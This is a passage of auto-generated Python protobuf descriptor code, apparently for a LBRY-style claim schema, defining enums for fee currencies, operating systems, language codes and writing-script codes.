n\x04R222\x10\xe0\x02\x12\t\n\x04R320\x10\xe1\x02\x12\t\n\x04R340\x10\xe2\x02\x12\t\n\x04R484\x10\xe3\x02\x12\t\n\x04R558\x10\xe4\x02\x12\t\n\x04R591\x10\xe5\x02\x12\t\n\x04R005\x10\xe6\x02\x12\t\n\x04R032\x10\xe7\x02\x12\t\n\x04R068\x10\xe8\x02\x12\t\n\x04R074\x10\xe9\x02\x12\t\n\x04R076\x10\xea\x02\x12\t\n\x04R152\x10\xeb\x02\x12\t\n\x04R170\x10\xec\x02\x12\t\n\x04R218\x10\xed\x02\x12\t\n\x04R238\x10\xee\x02\x12\t\n\x04R254\x10\xef\x02\x12\t\n\x04R328\x10\xf0\x02\x12\t\n\x04R600\x10\xf1\x02\x12\t\n\x04R604\x10\xf2\x02\x12\t\n\x04R239\x10\xf3\x02\x12\t\n\x04R740\x10\xf4\x02\x12\t\n\x04R858\x10\xf5\x02\x12\t\n\x04R862\x10\xf6\x02\x12\t\n\x04R021\x10\xf7\x02\x12\t\n\x04R060\x10\xf8\x02\x12\t\n\x04R124\x10\xf9\x02\x12\t\n\x04R304\x10\xfa\x02\x12\t\n\x04R666\x10\xfb\x02\x12\t\n\x04R840\x10\xfc\x02\x12\t\n\x04R010\x10\xfd\x02\x12\t\n\x04R142\x10\xfe\x02\x12\t\n\x04R143\x10\xff\x02\x12\t\n\x04R398\x10\x80\x03\x12\t\n\x04R417\x10\x81\x03\x12\t\n\x04R762\x10\x82\x03\x12\t\n\x04R795\x10\x83\x03\x12\t\n\x04R860\x10\x84\x03\x12\t\n\x04R030\x10\x85\x03\x12\t\n\x04R156\x10\x86\x03\x12\t\n\x04R344\x10\x87\x03\x12\t\n\x04R446\x10\x88\x03\x12\t\n\x04R408\x10\x89\x03\x12\t\n\x04R392\x10\x8a\x03\x12\t\n\x04R496\x10\x8b\x03\x12\t\n\x04R410\x10\x8c\x03\x12\t\n\x04R035\x10\x8d\x03\x12\t\n\x04R096\x10\x8e\x03\x12\t\n\x04R116\x10\x8f\x03\x12\t\n\x04R360\x10\x90\x03\x12\t\n\x04R418\x10\x91\x03\x12\t\n\x04R458\x10\x92\x03\x12\t\n\x04R104\x10\x93\x03\x12\t\n\x04R608\x10\x94\x03\x12\t\n\x04R702\x10\x95\x03\x12\t\n\x04R764\x10\x96\x03\x12\t\n\x04R626\x10\x97\x03\x12\t\n\x04R704\x10\x98\x03\x12\t\n\x04R034\x10\x99\x03\x12\t\n\x04R004\x10\x9a\x03\x12\t\n\x04R050\x10\x9b\x03\x12\t\n\x04R064\x10\x9c\x03\x12\t\n\x04R356\x10\x9d\x03\x12\t\n\x04R364\x10\x9e\x03\x12\t\n\x04R462\x10\x9f\x03\x12\t\n\x04R524\x10\xa0\x03\x12\t\n\x04R586\x10\xa1\x03\x12\t\n\x04R144\x10\xa2\x03\x12\t\n\x04R145\x10\xa3\x03\x12\t\n\x04R051\x10\xa4\x03\x12\t\n\x04R031\x10\xa5\x03\x12\t\n\x04R048\x10\xa6\x03\x12\t\n\x04R196\x10\xa7\x03\x12\t\n\x04R268\x10\xa8\x03\x12\t\n\x04R368\x10\xa9\x03\x12\t\n\x04R376\x10\xaa\x03\x12\t\n\x04R400\x10\xab\x03\x12\t\n\x04R414\x10\xac\x03\x12\t\n\x04R422\x10\xad\x03\x12\t\n\x04R512\x10\xae\x03\x12\t\n\x04R634\x10\xaf\x03\x12\t\n\x04R682\x10\xb0\x03\x12\t\n\x04R275\x10\xb1\x03\x12\t\n\x04R760\x10\xb2\x03\x12\t\n\x04R792\x10\xb3\x03\x12\t\n\x04R784\x10\xb4\x03\x12\t\n\x04R887\x10\xb5\x03\x12\t\n\x04R150\x10\xb6\x03\x12\t\n\x04R151\x10\xb7\x03\x12\t\n\x04R112\x10\xb8\x03\x12\t\n\x04R100\x10\xb9\x03\x12\t\n\x04R203\x10\xba\x03\x12\t\n\x04R348\x10\xbb\x03\x12\t\n\x04R616\x10\xbc\x03\x12\t\n\x04R498\x10\xbd\x03\x12\t\n\x04R642\x10\xbe\x03\x12\t\n\x04R643\x10\xbf\x03\x12\t\n\x04R703\x10\xc0\x03\x12\t\n\x04R804\x10\xc1\x03\x12\t\n\x04R154\x10\xc2\x03\x12\t\n\x04R248\x10\xc3\x03\x12\t\n\x04R830\x10\xc4\x03\x12\t\n\x04R831\x10\xc5\x03\x12\t\n\x04R832\x10\xc6\x03\x12\t\n\x04R680\x10\xc7\x03\x12\t\n\x04R208\x10\xc8\x03\x12\t\n\x04R233\x10\xc9\x03\x12\t\n\x04R234\x10\xca\x03\x12\t\n\x04R246\x10\xcb\x03\x12\t\n\x04R352\x10\xcc\x03\x12\t\n\x04R372\x10\xcd\x03\x12\t\n\x04R833\x10\xce\x03\x12\t\n\x04R428\x10\xcf\x03\x12\t\n\x04R440\x10\xd0\x03\x12\t\n\x04R578\x10\xd1\x03\x12\t\n\x04R744\x10\xd2\x03\x12\t\n\x04R752\x10\xd3\x03\x12\t\n\x04R826\x10\xd4\x03\x12\t\n\x04R039\x10\xd5\x03\x12\t\n\x04R008\x10\xd6\x03\x12\t\n\x04R020\x10\xd7\x03\x12\t\n\x04R070\x10\xd8\x03\x12\t\n\x04R191\x10\xd9\x03\x12\t\n\x04R292\x10\xda\x03\x12\t\n\x04R300\x10\xdb\x03\x12\t\n\x04R336\x10\xdc\x03\x12\t\n\x04R380\x10\xdd\x03\x12\t\n\x04R470\x10\xde\x03\x12\t\n\x04R499\x10\xdf\x03\x12\t\n\x04R807\x10\xe0\x03\x12\t\n\x04R620\x10\xe1\x03\x12\t\n\x04R674\x10\xe2\x03\x12\t\n\x04R688\x10\xe3\x03\x12\t\n\x04R705\x10\xe4\x03\x12\t\n\x04R724\x10\xe5\x03\x12\t\n\x04R155\x10\xe6\x03\x12\t\n\x04R040\x10\xe7\x03\x12\t\n\x04R056\x10\xe8\x03\x12\t\n\x04R250\x10\xe9\x03\x12\t\n\x04R276\x10\xea\x03\x12\t\n\x04R438\x10\xeb\x03\x12\t\n\x04R442\x10\xec\x03\x12\t\n\x04R492\x10\xed\x03\x12\t\n\x04R528\x10\xee\x03\x12\t\n\x04R756\x10\xef\x03\x12\t\n\x04R009\x10\xf0\x03\x12\t\n\x04R053\x10\xf1\x03\x12\t\n\x04R036\x10\xf2\x03\x12\t\n\x04R162\x10\xf3\x03\x12\t\n\x04R166\x10\xf4\x03\x12\t\n\x04R334\x10\xf5\x03\x12\t\n\x04R554\x10\xf6\x03\x12\t\n\x04R574\x10\xf7\x03\x12\t\n\x04R054\x10\xf8\x03\x12\t\n\x04R242\x10\xf9\x03\x12\t\n\x04R540\x10\xfa\x03\x12\t\n\x04R598\x10\xfb\x03\x12\t\n\x04R090\x10\xfc\x03\x12\t\n\x04R548\x10\xfd\x03\x12\t\n\x04R057\x10\xfe\x03\x12\t\n\x04R316\x10\xff\x03\x12\t\n\x04R296\x10\x80\x04\x12\t\n\x04R584\x10\x81\x04\x12\t\n\x04R583\x10\x82\x04\x12\t\n\x04R520\x10\x83\x04\x12\t\n\x04R580\x10\x84\x04\x12\t\n\x04R585\x10\x85\x04\x12\t\n\x04R581\x10\x86\x04\x12\t\n\x04R061\x10\x87\x04\x12\t\n\x04R016\x10\x88\x04\x12\t\n\x04R184\x10\x89\x04\x12\t\n\x04R258\x10\x8a\x04\x12\t\n\x04R570\x10\x8b\x04\x12\t\n\x04R612\x10\x8c\x04\x12\t\n\x04R882\x10\x8d\x04\x12\t\n\x04R772\x10\x8e\x04\x12\t\n\x04R776\x10\x8f\x04\x12\t\n\x04R798\x10\x90\x04\x12\t\n\x04R876\x10\x91\x04\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_CLAIMLIST_LISTTYPE = _descriptor.EnumDescriptor(
name='ListType',
full_name='pb.ClaimList.ListType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COLLECTION', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DERIVATION', index=1, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=852,
serialized_end=894,
)
_sym_db.RegisterEnumDescriptor(_CLAIMLIST_LISTTYPE)
_FEE_CURRENCY = _descriptor.EnumDescriptor(
name='Currency',
full_name='pb.Fee.Currency',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_CURRENCY', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LBC', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BTC', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USD', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1096,
serialized_end=1155,
)
_sym_db.RegisterEnumDescriptor(_FEE_CURRENCY)
_SOFTWARE_OS = _descriptor.EnumDescriptor(
name='OS',
full_name='pb.Software.OS',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_OS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ANY', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LINUX', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOWS', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MAC', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ANDROID', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IOS', index=6, number=6,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1332,
serialized_end=1416,
)
_sym_db.RegisterEnumDescriptor(_SOFTWARE_OS)
_LANGUAGE_LANGUAGE = _descriptor.EnumDescriptor(
name='Language',
full_name='pb.Language.Language',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_LANGUAGE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='en', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='aa', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ab', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ae', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='af', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ak', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='am', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='an', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ar', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='as', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='av', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ay', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='az', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ba', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='be', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bg', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bh', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bi', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bm', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bn', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bo', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='br', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bs', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ca', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ce', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ch', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='co', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cr', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cs', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cu', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cv', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cy', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='da', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='de', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='dv', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='dz', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ee', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='el', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='eo', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='es', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='et', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='eu', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fa', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ff', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fi', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fj', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fo', index=47, number=47,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fr', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fy', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ga', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gd', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gl', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gn', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gu', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gv', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ha', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='he', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hi', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ho', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hr', index=60, number=60,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ht', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hu', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hy', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hz', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ia', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='id', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ie', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ig', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ii', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ik', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='io', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='is', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='it', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='iu', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ja', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='jv', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ka', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kg', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ki', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kj', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kk', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kl', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='km', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kn', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ko', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kr', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ks', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ku', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kv', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kw', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ky', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='la', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lb', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lg', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='li', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ln', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lo', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lt', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lu', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lv', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mg', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mh', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mi', index=103, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mk', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ml', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mn', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mr', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ms', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mt', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='my', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='na', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nb', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nd', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ne', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ng', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nl', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nn', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='no', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nr', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nv', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ny', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='oc', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='oj', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='om', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='or', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='os', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pa', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pi', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pl', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ps', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pt', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='qu', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rm', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rn', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ro', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ru', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rw', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sa', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sc', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sd', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='se', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sg', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='si', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sk', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sl', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sm', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sn', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='so', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sq', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sr', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ss', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='st', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='su', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sv', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sw', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ta', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='te', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tg', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='th', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ti', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tk', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tl', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tn', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='to', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tr', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ts', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tt', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tw', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ty', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ug', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='uk', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ur', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='uz', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ve', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='vi', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='vo', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='wa', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='wo', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='xh', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='yi', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='yo', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='za', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='zh', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='zu', index=184, number=184,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1548,
serialized_end=3109,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE_LANGUAGE)
_LANGUAGE_SCRIPT = _descriptor.EnumDescriptor(
name='Script',
full_name='pb.Language.Script',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_SCRIPT', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Adlm', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Afak', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Aghb', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ahom', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Arab', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Aran', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Armi', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Armn', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Avst', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bali', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bamu', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bass', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Batk', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Beng', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bhks', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Blis', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bopo', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Brah', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Brai', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bugi', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Buhd', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cakm', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cans', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cari', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cham', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cher', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cirt', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Copt', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cpmn', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cprt', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cyrl', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cyrs', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Deva', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dogr', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dsrt', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dupl', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyd', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyh', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyp', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Elba', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Elym', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ethi', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Geok', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Geor', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Glag', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gong', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gonm', index=47, number=47,
options=None,
type=None),
